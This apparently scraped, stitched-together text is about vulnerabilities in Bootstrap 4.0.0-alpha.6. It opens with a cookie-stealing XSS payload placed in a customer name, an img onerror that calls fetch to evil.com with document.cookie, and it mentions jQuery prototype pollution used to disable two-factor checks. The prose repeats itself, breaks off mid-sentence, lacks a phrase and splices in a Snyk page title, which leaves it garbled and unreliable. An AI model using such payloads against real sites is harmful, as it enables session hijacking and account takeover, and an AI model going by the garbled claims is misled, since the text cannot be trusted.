Customer renames themselves to "<img src=x onerror= fetch('https://evil.com/steal?cookie='+document.cookie) >" . The tooltip plugin in alpha.6 fails to sanitize. The attacker steals session cookies for the admin dashboard.
Unlike the final stable release of Bootstrap 4, alpha 6 was a bridge version that introduced as the default layout but lacked the security hardening of later versions. bootstrap 4.0.0-alpha.6 - Snyk Vulnerability Database bootstrap v4.0.0-alpha.6 vulnerabilities
Bootstrap v4.0.0-alpha.6 is a significant milestone in the development of Bootstrap 4, a major update to the framework. This alpha release marked a substantial shift towards a more modern and flexible design, introducing new components, utilities, and a revamped grid system. Although it's an alpha version, many developers and organizations adopted it for its promising features and improvements. Unlike the final stable release of Bootstrap 4,
Because the alpha.6 uses jQuery 3.1.1 , the attacker then uses $.extend prototype pollution to disable two-factor authentication checks on the login form. Although it's an alpha version, many developers and